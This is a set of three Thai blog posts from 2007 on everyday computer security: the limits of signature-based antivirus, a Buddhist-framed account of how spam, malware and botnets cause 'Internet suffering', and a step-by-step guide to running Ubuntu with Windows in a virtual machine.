ซอฟต์แวร์ แอนตี้ไวรัส ถึงเวลาแล้วหรือ ที่จะเกิดจุดจบ ? ยังหลอกครับแค่ผมมองอนาคตไปไกลอีกแล้ว แค่มีความเป็นไปได้เท่านั้นเอง ว่าอาจจะถึงจุดจบ ด้วยเหตุผล 2 ประการ ดังนี้

ประการที่ 1 ซอฟต์แวร์แอนตี้ไวรัส ถือได้ว่าเป็น Blacklisting Technology นั้นหมายถึงต้องอาศัยฐานข้อมูล (Data Base / Signature) เพื่อให้ทราบถึง ชื่อ ประเภทและข้อมูลของไวรัส ถ้าเป็นเช่นนั้น ผู้ใช้จำเป็นต้อง Update ฐานข้อมูลอย่างสม่ำเสมอ ถึงจะปลอดภัยกับปัญหาไวรัสและภัยคุกคามตัวอื่นๆ ไม่ว่าเป็น Worm , Trojan / SPyware/ Adware / Spam ไปได้ โดยเฉพาะสมัยนี้ถือได้ว่ามีชนิดไวรัสใหม่ๆ เกิดขึ้นไม่เว้นแต่ละวัน แต่ละชั่วโมง และต่อไปอาจเป็นแต่ละนาที หรือแต่ละวินาที ก็อาจเป็นไปได้
ฉะนั้นเมื่อกาลเวลาผ่านไป ผู้ใช้อินเตอร์เน็ตมีจำนนวนมากขึ้น มีผู้ไม่หวังดีมากขึ้นตามจำนวนการใช้งาน เกิดมีผู้เขียนไวรัสมากขึ้นตามไปด้วย ด้วยเหตุปัจจัยเหล่านี้เอง ทำให้ผู้ที่ต้องใช้ซอฟต์แวร์แอนตี้ไวรัส ต้องหมั่นตรวจสอบตัวเองเพื่อไม่ให้ตกเป็นเหยื่อได้ แน่นอนย่อมพลาดและเสียทีให้กับไวรัส ที่ไม่พึ่งประสงค์ได้



จากข้อมูล shadowserver พบว่ามีไวรัสเกิดใหม่ทุกๆวันและมีปริมาณที่สูงขึ้น และมีไวรัสที่แอนตี้ไวรัสเจ้าอื่นๆที่ขายและให้บริการอยู่ไม่สามารถตรวจตรงกันได้เช่นกัน
ทำให้เดาได้ว่า เครื่องคอมพิวเตอร์ส่วนบุคคล หากใช้ระบบปฏิบัติ Windows อาจจะจำเป็นต้องลงโปรแกรมแอนตี้ไวรัสมากกว่า 1 ชนิดในเครื่องเดียวกัน เพื่อป้องกันการตรวจจับไม่เจอของไวรัสคอมพิวเตอร์อีกด้วย จึงเป็นเรื่องที่ยาก ที่จะไม่ทำให้เครื่องใช้งานส่วนบุคคล ทำงานช้าเพราะมั่วแต่ Update ฐานข้อมูล และการตรวจจับแบบ Real Time ที่ค่อยป้องกันให้เครื่องปลอดภัยในการท่องอินเตอร์เน็ต แต่ละวันได้ ไม่ว่าเป็นการเปิดเว็บ สมัยใหม่ด้วยแล้ว เปิดเว็บเพียงหน้าเดียวแต่ติดต่อกับมายังเครื่องเราหลาย session เนื่องจากเป็น Dynamic Web ความเสี่ยงตามมา การใช้อีเมล์ ความเสี่ยงที่พบไม่ว่าเป็น Spam และ phishing รวมถึง Scam Web อาจทำให้เราตกเป็นเหยื่อได้ ถึงแม้ใช้โปรแกรมแอนตี้ไวรัสก็ตาม
เหตุของปัจจัยที่ทำให้เครื่องคอมพิวเตอร์ส่วนบุคคลช้า เนื่องจากโปรแกรมแอนตี้ไวรัส ที่ใช้ Blacklist Technology คือ
1. เครื่องคอมพิวเตอร์หน่วง เน่ืองจากฐานข้อมูล และกลไกลในการตรวจจับแบบ Real Time
2. เคร่ืองคอมพิวเตอร์หน่วง เนื่องจาก ซอฟต์แวร์แอนตี้ไวรัสไปเกาะการทำงานระบบ Operating System เพื่อใช้ในการ Update ข้อมูล และตรวจค่า License กับบริษัทผู้ผลิต
3. ลักษณะการใช้งานอินเตอร์เน็ตในยุคปัจจุบัน ที่ต้องท่องอินเตอร์เน็ตผ่าน (www) แล้วมีลักษณะการเขียน เว็บที่เป็น Dynamic โดยอาศัยเทคโนโลยี Ajax ที่การประมวลผลจะมาหนักที่เครื่องลูกข่าย (Client) จึงเป็นผลเครื่องคอมพิวเตอร์ช้า และโปรแกรมแอนตี้ไวรัสจะทำงานหนักขึ้นอีกด้วย
4. โปรแกรมแอนตี้ไวรัสในยุคปัจจุบัน มักรวมความสามารถในการตรวจจับได้ในหลายส่วน เรียกว่า เป็น Internet Security ที่ประกอบด้วย การป้องกันไวรัส worm ป้องกัน Spam , phishing และ scam web เป็นต้น จึงทำให้ต้องการฐานข้อมูลที่มากพอ ที่จะเรียนรู้ภัยคุกคามสมัยใหม่ ได้ทัน
5. ภัยคุกคามที่เรียกว่า 0 day เกิดจากช่องโหว่ของ Application Software มีมากขึ้นตามจำนวนซอฟต์แวร์ใหม่ ที่เกิดขึ้น จึงทำให้ต้องมีการแข่งขันกันสำหรับผู้ผลิต ถึงฐานข้อมูลโปรแกรมแอนตี้ไวรัส ต้องตามให้ทันกับภัยคุกคามสมัยใหม่

โปรดติดต่อตอนต่อไป
นนทวรรธนะ สาระมาน
Nontawattana Saraman
28/08/50

Internet suffering

.. เพราะสิ่งนี้มีสิ่งนี้จึงมี เพราะสิ่งนี้ไม่มีสิ่งนี้จึงไม่มี ..

“สรรพสิ่งล้วนเปลี่ยนแปลงไปเพราะกระแสของเหตุปัจจัย หรือ อิทัปปัจจยตา สิ่งใดมีเพราะมีเหตุปัจจัยให้มี ส่ิงใดไม่มีเพราะไม่มีเหตุปัจจัยให้มี ไม่มีอะไรมีหรือไม่มีโดยตัวของมันเอง กระแสของเหตุปัจจัยหรือความเป็นเช่นนั้นเ่อง (ตถตา = ความเป็นเช่นนั้นเอง) คือความจริง การอยากให้มีหรืออยากให้ไม่มีตามใจเราไม่ใช่ความจริง ..”

ความเป็นจริง ทางโลกความมั่นคง ข้อมูลสารสนเทศ ผมตั้งศัพท์ไว้ว่า Information Security Ontology นั้นก็คือ อิปัปปัจจยตา ในทางโลกของข้อมูลสารสนเทศ นั่นเอง
บทความใน blog นี้ ผมต้องการแสดงออกถึงความเป็นจริง อันเป็นเหตุของปัจจัยที่สร้างปัญหาทางการใช้เทคโนโลยีในภาษาที่เข้าใจง่าย สร้างเสริมความตระหนักในการใช้ข้อมูลสารสนเทศ และจริยธรรมอันดีให้กับผู้ใช้อินเตอร์เน็ตในประเทศไทย

บทหนึ่ง Internet Suffering

เรามานั่งนึกๆ ถึงเหตุปัจจัยจาก Spam (อีเมล์ขยะที่ไม่พึ่งต้องการ) ที่เราได้รับในแต่ละวันจำนวนมาก เหตุปัจจัยนี้เกิดจากสิ่งหนึ่ง มีผลกับสิ่งหนึ่งทำให้เกิดสิ่งนี้ ที่เรียกว่า Spam เป็นเหตุปัจจัย เกิดความทุกข์ รำคาญ และหงุดหงิดกับสิ่งที่ไม่ต้องการ เหตุปัจจัยดั่งกล่าวเชื่อมโยงกันเป็นปัญหาลูกโซ่บนระบบอินเตอร์เน็ตจนทำให้เกิดทุกข์ (Internet Suffering) นอกจาก Spam แล้วก็ยังมีอีกหลายๆ เหตุปัจจัยทำให้เกิดปัญหาบนโลกอินเตอร์เน็ตในการใช้งานคอมพิวเตอร์ในแต่ละวัน ไม่ว่าเป็น Hacker ,Virus/worm , Spyware , Trojan , Phishing อื่นๆ ที่พบได้

สาเหตุของปัญหา เกิดขึ้นจาก คน และไม่่ใช่คน บนเจตนา และไม่เจตนา โดยที่เหยื่อคือ คนที่รู้เท่าไม่ถึงการณ์

อันที่เป็นคน คือ ผู้ที่มีเจตนาไม่หวังดี หรือเรียกว่า (Hacker/Attacker)

อันที่ไม่ใช่คน คือ ซอฟต์แวร์ที่ผลิตขึ้นบนเจตนาที่ไม่หวังดี เรียกว่า malware ซึ่งอาศัยเครื่องคอมพิวเตอร์ของผู้อื่น เป็นผู้กระทำการใดการหนึ่งที่สร้างความเสียหายให้เกิดขึ้น โดยเครื่องที่ถูก Malware อาศัยอยู่ เรียกว่า zombie มักกระทำการโดยรับคำสั่งจากผู้ไม่หวังดี (hacker/attacker) โดยทำการใดการหนึ่งจากความไม่เจตนา เพื่อทำสิ่งใดสิ่งหนึ่งที่เป็นเหตุของปัจจัยทำให้เกิด Internet Suffering มักนิยมอาศัยบนเครื่องผู้อื่นที่ขาดความรู้เท่าไม่ถึงการณ์ เมื่อ zombie หลายๆเครื่องรวมกัน เรียกว่า botnet
และ botnet คือพาหนะที่ทำให้เกิด Internet Suffering หลากหลายปัญหาเกิดขึ้นจากสิ่งนี้

ตามหลักอิทัปปัจจยตา (ความจริงทางธรรมชาติ) แล้วเมื่อเราลำดับเหตุการณ์ของปัญหา Spam โฆษณายาลดความอ้วนยี่ห้อหนึ่งที่เข้าสู่ Mail box ของเราจะพบว่า
IP ที่ส่ง Spam โฆษณาตัวนี้ มาได้ 2 ทาง ประกอบด้วย
1. ทางตรง จากผู้ไม่ประสงค์ดี และส่ง Mail มาโดยตรงถึงเรา เมื่อเปิดอ่าน mail พบว่าเป็นสิ่งที่เราไม่ต้องการรับรู้ กลายเป็น Spam
2. ทางอ้อม จากผู้ไม่รู้ ที่เป็นเหยื่อ (zombie) ส่งมาถึงเรา
กระบวนการผู้ไม่รู้ หรือที่เป็นเหยื่อ (zombie) มักเกิดขึ้นได้ จากการใช้อินเตอร์เน็ต
ยกตัวอย่าง ผู้ไม่รู้ นามสมมุติ A ทำการเข้าอินเตอร์เน็ต และเปิดบราวเซอร์ เพื่อท่องเว็บ (www) แห่งหนึ่ง พบ โปรแกรมเสริม ที่ช่วยให้เล่นอินเตอร์เน็ต ได้ไว ขึ้น เพราะความอยากรู้ หรือ โลภ จึงทำการ Download เพื่อทำการลงโปรแกรมดังกล่าว ทั้งทีโปรแกรมนี้มีการฝั่ง Malware (ซอฟต์แวร์ที่มีเจตนาไม่พึ่งประสงค์จาก Hacker / Attacker) เมื่อทำการติดตั้งโปรแกรมสำเร็จแล้ว เครื่องคอมพิวเตอร์นาย A กับไม่ได้ท่องอินเตอร์เน็ตได้เร็วขึ้นแต่อย่างใด กับกลายเป็น Zombie ให้กับนาย B ผู้เขียนซอฟต์แวร์นี้ขึ้น
ทั้งนี้แล้วนาย A ก็ยังไม่รู้ตัว และทุกครั้ง ที่นาย A ท่องอินเตอร์เน็ต เครื่องนาย A จะทำการส่ง e-mail ไปยังเพื่อนๆ ในรายชื่อ mail บนเครื่องตนเอง เป็น โฆษณายาลดความอ้วนอยู่เสมอ ที่แย่กว่านั้น Malware ที่นาย B เขียนขึ้น ยังบังคับให้เครื่องคอมพิวเตอร์นาย A ส่ง Password ทั้งหมดในเครื่องมายังที่ตน เหตุการณ์ทั้งหมดที่เกิดขึ้นนาย A ไม่ได้มีเจตนาในการส่ง e-mail โฆษณา เลย เป็นเพราะความรู้เท่าไม่ถึงการณ์ที่ลงโปรแกรมเพิ่มความเร็วเท่านั้นเอง
นี้เป็นตัวอย่างหนึ่งของเหตุปัจจัยการทำให้เกิด Internet Suffering จำนวน Zombie หรือเครื่องที่ต้องเป็นเหยื่อ ที่ยังไม่รู้ตัวมีจำนวนมาก ตามขนาดการเจริญเติบโตอินเตอร์เน็ต จะมีผู้ใช้หน้าใหม่ และ ผู้ใช้ที่ไม่ระวังตกเป็นเหยื่อ ปริมาณของพฤติกรรมนี้เองทำให้เกิด Internet Suffering
แนวทางการป้องกันคือ เริ่มจากตนเองก่อน เครื่องคอมพิวเตอร์ของเราต้องปลอดภัยเสียก่อน เมื่อท่องอินเตอร์เน็ต สร้างเสริมพฤติกรรมใหม่ ให้มีสติ และพึ่งระวังการใช้งานในการท่องอินเตอร์เน็ต โดยพึ่งสังเกตเสมอว่า ทุกย่างก้าวของเราล้วนมีความเสี่ยง
ส่วนผู้ที่มีความรู้แล้ว ควรมีหิริโอตัปปะ คือความละอายต่่อบาป มีจริยธรรมในการใช้งานอินเตอร์เน็ต (ethical hacker)

“สรรพสิ่งทั้งหลายล้วนเป็นอนิจจัง คือเปลี่ยนแปลงไม่หยุดนิ่ง นั่นคือความจริง แต่เรามักติดอยู่ในความไม่จริง คือคิดว่าสิ่งต่างๆ เป็นนิจจัง”

นนทวรรธนะ สาระมาน
Nontawattana Saraman
23/08/50

อ้างอิงบางประโยคจาก หนังสือ ความจริง ความงาม ความดี โดย ศ.นพ. ประเวศ วะสี
บทความ ลมหายใจระบบเครือข่าย 3 in 3 out เขียนเมื่อ เดือนพฤษภาคม 2550
บทความ กองทัพ botnet คืออะไร เขียนเมื่อ เดือนกุมภาพันธ์ 2550
บทความ เหตุของปัญหาระบบเครือข่ายคอมพิวเตอร์ เขียนเมื่อ เดือนพฤศจิกายน 2549
งานบรรยาย http://nontawattalk.blogspot.com/2007/07/by-your-side.html

ใช้ซอฟต์แวร์อย่างคุ้มค่าและปลอดภัยในการท่องอินเตอร์เน็ต

สำหรับคอมพิวเตอร์ส่วนบุคคล แล้วการใช้งานจำเป็นต้องเหมาะสม และมีความถนัดในการทำกิจกรรมต่างๆ ไม่ว่าจะท่องโลกอินเตอร์เน็ต การจัดพิมพ์เอกสาร การดูหนังฟังเพลง หรือตลอดจนการเล่นเกมส์
ผมได้ทดลองกับตัวเอง โดยการหาคุณสมบัติคอมพิวเตอร์โน็ตบุ๊ต ที่มีคุณสมบัติขั้นต่ำดังนี้
1. CPU ความเร็วไม่น้อยกว่า 1.6 Ghz
2. RAM ความเร็วไม่ต่ำกว่า 1 Ghz
3. Harddisk ความจุไม่ต่ำกว่า 80 GB

ที่ต้องเลือกคุณสมบัติเครื่องที่สูงเนื่องจากต้องการสร้างระบบปฏิบัติการหลัก (Core Operating System)เป็น Linux และต้องสร้างระบบปฏิบัติการเสริมเป็น Windows เพื่อสำหรับใช้ในซอฟต์แวร์บางตัวที่ระบบปฏิบัติการ Linux ยังมีความสามารถไม่ถึง ได้แก่ซอฟต์แวร์ในการแผนผังระบบเครือข่าย โดยปกติเราใช้ Microsoft Visio หรือโปรแกรมเกี่ยวกับการตกแต่งรูป ที่ Windows สามารถเลือกใช้ได้หลายตัวไม่ว่าเป็น Photoshop หรือ illustrator ใน Linux มีการใช้ซอฟต์แวร์ตัวนี้ได้เกือบจะดีคือ Gimp แต่ก็ยังไม่เพียงพอสำหรับนักออกแบบที่เคยติดกับการใช้งานบนระบบปฏิบัติการ Windows ได้ เป็นต้น

Step by Step การทำให้เครื่องคอมพิวเตอร์ของเราปลอดภัย
1. แบ่งการเก็บเนื้อที่ฮาร์ดดิส อย่างน้อย 2 Patition คือมีให้เก็บเฉพาะข้อมูล 1 Patition และมีให้ใช้สำหรับระบบปฏิบัติการอีก 1 patition ไม่ควรเก็บข้อมูลใน Patition เดียวเพราะหากระบบปฏิบัติการมีปัญหาข้อมูลอาจมีความเสียหายได้ ปัญหาหลักๆ ของระบบปฏิบัติการมีปัญหานั้นได้แก่ การติดไวรัส นั้นเอง
โดยสมมุติ หากเรามีเนื้อที่ฮาร์ดิสอยู่ 80 GB ผมทำการแบ่งให้กับการเก็บข้อมูล 40 Gb และ ระบบปฏิบัติการอีก 40 Gb

2. สำหรับระบบปฏิบัติการหลัก ผมเลือกลง Linux ที่ใช้ Distro Debian นั้นคือ Ubuntu Linux นั้นเอง สำหรับใครชอบ X Windows แบบใด ไม่ว่าเป็น Gnome หรือ KDE หรืออื่นๆ ก็สามารถเลือกใช้ได้ตามต้องการ สำหรับผมเลือก Gnome เนื่องจากความถนัดส่วนตัวครับ
ที่เลือก Debian Ubuntu เนื่องจากมีระบบ Update Software และ Update Security Patch แบบอัตโนมัติ ผ่านโปรแกรมที่ชื่อว่า Update Manager และการกำหนดโปรแกรมที่ลงผ่าน Synaptic Package Manager ทำให้เรามีซอฟต์แวร์ที่ทันสมัยอยู่เสมอ (ปลอดภัยและทันสมัย) อีกทั้งไม่ต้องเสียค่า License ในการ Update อีกด้วยครับ

จากเดิมที่แบ่งระบบปฏิบัติการไป 40 Gb ก็อย่างลืม ลงเพื่อใช้ Swap space ไปสัก 10% การใช้งานเนื้อที่ฮาร์ดิสและการประมวลผลด้วยนะครับ เพื่อว่าหาก RAM เครื่องหมดจะมาใช้ต่อที่ตัวนี้กัน
ส่วนการตั้ง Path ตามสำควรและความถนัดครับ

3. เมื่อทำการลงระบบปฏิบัติการหลักเสร็จแล้ว เราก็จะทำการลงซอฟต์แวร์ ที่มีความจำเป็นสำหรับการใช้งาน
ผมแยกกันลืมสำหรับตัวเองด้วย ดังนี้ครับ
3.1 Accessories เพิ่มโปรแกรมที่ชื่อ Wine เป็นโปรแกรมที่สามารถรันไฟล์ที่ใช้กับระบบปฏิบัติการ Windows ได้ ที่ผมเลือก wine เพราะผมจำเป็นต้องใช้ SSH Client อยู่เพื่อทำการ Remote และ FTP ผ่าน SSH Protocol รัน Wine เพื่อใช้ SSH ไม่ได้รัน Wine เพื่อเล่นเกมส์ที่เหมาะกับ Windows นะหากคิดอย่างนั้นต้องมี RAM เยอะหน่อยครับ โชคดีหน่อยผมไม่ติดเกมส์ และ Chat ส่วน Linux หากชอบ Chat เราจะเลือกใช้ Gaim ได้ครับตัวนี้รองรับ chat ได้หลายตัวทีเดียว
3.2 Graphics ผมเพิ่มโปรแกรม
– Dia Diagram editor ไว้สำหรับทำงานการเขียนแผนผังระบบเครือข่าย ตัวนี้ยังสู้ Windows ไม่ได้ แต่ก็พอใช้งานได้ครับ
– Ksnapshot เพื่อใช้ในการ Capture ภาพ และตัดต่อภาพ เพื่อ ทำรายงาน/ทำเว็บ
– OpenOffice Drawing ไว้วาดแผนผังต่างๆ
3.3 Internet ในตัว ubuntu มีบราวเซอร์มาให้คือ Firefox เพียงอันเดียวก็เกินพอแล้วครับ เพราะ Firefox มี add on มากมายให้เลือกใช้ แต่สำหรับผมแล้วเพิ่มอีกโปรแกรมคือ Opera เนื่องจากบางเว็บไซด์ในไทยยังเขียนเพื่อให้อ่านบราวเซอร์ที่ Windows ใช้คือ IE อยู่จึงไม่สะดวกนักหากใช้เพียง Firefox อาจจะอ่านเว็บเหล่านั้นได้ยาก Opera จึงเป็นอีกทางเลือกหนึ่งสำหรับอ่านเว็บภาษาไทยที่ยังขาดการตัดคำและจัดหน้าเพจไม่ได้รองรับกับ Firefox
– Mail Client ผมเลือก Thuderbird Mail ครับ ตัวนี้สะดวกดีและทำงานได้ดีไม่แพ้ outlook ครับ
Wireshark งานของผมมักเกี่ยวข้องกับระบบเครือข่าย ดังนั้นโปรแกรมที่ไว้วิเคราะห์ระบบเครือข่ายที่ดี คือ Ethereal ซึ่งปัจจุบันเปลี่ยนชื่อใหม่ว่า Wireshark ครับ ตัวนี้เหมาะกับระบบ Linux ใช้งานได้ดีมากครับ
3.4 Office ไม่ต้องสงสัยเราจำเป็นต้องใช้ Open office ถึงแม้จะสู้กับทาง Microsoft office ไม่ได้ก็ตาม ก็พอใช้ได้ครับ ณ ปัจจุบันทำงานได้ดีกว่าเก่าเยอะครับ ก็ยังมีปัญหาเรื่อง Font อยู่บ้างแต่เล็กน้อยเมื่อเทียบกับเมื่อก่อน ถือว่าพอใช้งานได้ครับ
3.5 Sound & video เพื่อให้อ่านเว็บและโปรแกรมที่ต้องดูหนังได้อย่างสมบูรณ์ยิ่งขึ้น ผมลงพวก Codex , Codine เพิ่มเติมครับ และใช้โปรแกรม Mplayer เกือบทั้งหมด ทั้งดูหนังและฟังเพลง ส่วนการไลท์แผ่นโปรแกรมแล้วเพิ่มเติมจากของเดิมที่ลงให้ โดยการลงโปรแกรมชื่อ K3B ช่วยได้เยอะครับ เหมือน Nero burnบน Windows ใช้งานง่าย ไม่ติดปัญหาครับ
3.6 System ส่วนลงเพิ่มเติมจากของเดิมดังนี้
– Windows Manager เลือกใช้ Beryl ช่วยให้ Desktop เราดูหรูขึ้นครับ เป็น 3D
– file system เลือกใช้ Ntfs3-3g เพื่อไว้เม้าหาฮาร์ดดิสที่เป็นระบบ NTFS ครับ นี้เป็นปัญหาหนึ่งที่ linux มีความยุ่งยากกว่าระบบ Windows อยู่
– Virtual machine ส่วนนี้ผมใช้ Open source ชื่อว่า Virtulbox หรือ Vmware player ก็ได้ครับ ทั้งคู่เป็น Open Source

4. ทำการลง Virual Machine เพื่อสร้างระบบปฏิบัติเสริมหลังลงระบบปฏิบัติการหลัก ในที่นี้เราใช้ Virtulbox เพื่อลงระบบปฏิบัติการ Windows XP ที่ต้องใช้ Windows บน Virual Machine เหตุผลคือ
ซอฟต์แวร์บางตัวบนระบบปฏิบัติการ Linux ยังใช้งานได้ไม่สมบูณ์ ว่าเป็นระบบตัดคำ ระบบสร้างกราฟิก รวมถึงการโปรแกรมวาดแผนผังระบบเครือข่าย เป็นต้น สำหรับผมแล้ว พบว่าการส่งข้อมูลเสียงผ่านอินเตอร์เน็ทระบบปฏิบัติการ Windows ทำได้ดีกว่า linux อยู่บ้างในบางเว็บไซด์ และดันเป็นเว็บไซด์ที่ผมต้องเข้าไปฟังเนื้อหาเป็นประจำ จึงต้องเลือกลง Virual Machine เป็น Windows
เมื่อทำการลงเสร็จ เราสามารถตัดหน้าจอโดยใช้เม้าเปลี่ยนเลือกเป็น Windows และ Linux ได้พร้อมกันโดยใช้ ความสามารถของ Beryl
นี้แหละครับเท่านี้เราก็หลีกเลี่ยงการติดไวรัสคอมพิวเตอร์ และพวก สปายแวร์ที่ติดตามโปรแกรมและพฤติกรรมการท่องอินเตอร์เน็ตเราได้มากพอสมควรเนื่องจาก ระบบปฏิบัติการหลักเราคือ Linux และ Windows อยู่ใน Virual Machine แล้วการติดไวรัสที่ทำร้ายต่อระบบปฏิบัติการ Windows ก็จะไม่แพร่กระจายไปสู่ระบบปฏิบัติการหลักที่เป็น Linux ยกเว้นบางกรณี ซึ่งถ้าเทียบตามความน่าจะเป็นแล้วน้อยมากที่เครื่องติดเป็น Zombie จากระบบปฏิบัติการ Linux ได้ยกเว้นจะโดน Hack เข้าสู่ระบบปฏิบัติการภายใน การติดจากการท่องอินเตอร์เน็ตนั้นน้อยกว่า Windows อยู่มาก และไม่ต้องกังวลต้องลงซอฟต์แวร์แอนตี้ไวรัส เพื่อทำให้เครื่องโหลดจากฐานข้อมูลไวรัสที่มีการ Update ตลอด ไม่ต้องกังวลเครื่องจะเป็น Backdoor อีกต่อไปเพราะระบบปฏิบัติการเราเป็น Open Source หากเล่นกันชำนาญเราปรับแต่งได้เองอีกมากมาย
หากต้องการกันไวรัสที่อาจเกิดขึ้นบนระบบปฏิบัติการ linux ก็มี Open source Anti virus ที่เป็นที่นิยมสูงคือ Clamav และหากต้องการใช้เป็นแบบ GUI บน linux ก้มีให้เลือกใช้เป็น klamav อีกด้วยครับ

ประโยชน์ที่ได้รับต่อไปคือการสร้างเสริมนิสัยให้ใช้ Open source และสร้างความคุ้นเคยกับระบบปฏิบัติการ Linux มากขึ้น จะได้ลดค่าใช้จ่ายในการใช้ซอฟต์แวร์ ที่มีลิขสิทธิอีกด้วยครับ
จงจำไว้ว่า ความปลอดภัยข้อมูล เริ่มจากตัวเองก่อน เริ่มจากเครื่องคอมพิวเตอร์ของเรา ต่อจากนั้นคือพฤติกรรมการใช้งานของเรา การใช้ข้อมูลผ่านเครือข่ายของเรา ออกสู่โลกภายนอก หากระบบปฏิบัติการบนเครื่องของเราแข็งแรงพอ และใช้ซอฟต์แวร์อย่างเหมาะสม และพอเพียง จะทำให้เรามีภูมิต้านทานได้ หากทุกคนมีความรู้ และมีความตระหนักในการใช้ข้อมูลสารสนเทศ เราจะสูญเสียเงินในการจัดซื้อจัดจ้้างระบบรักษาความปลอดภัยน้อยลง และปัญหาจุกจิกที่พบในชีวิตประจำวันเราก็จะน้อยลงไปด้วยเช่นกัน

นนทวรรธนะ สาระมาน
Nontawattana Saraman
18/08/50

บทความที่เกี่ยวข้อง http://nontawattalk.blogspot.com/2007/06/windows.html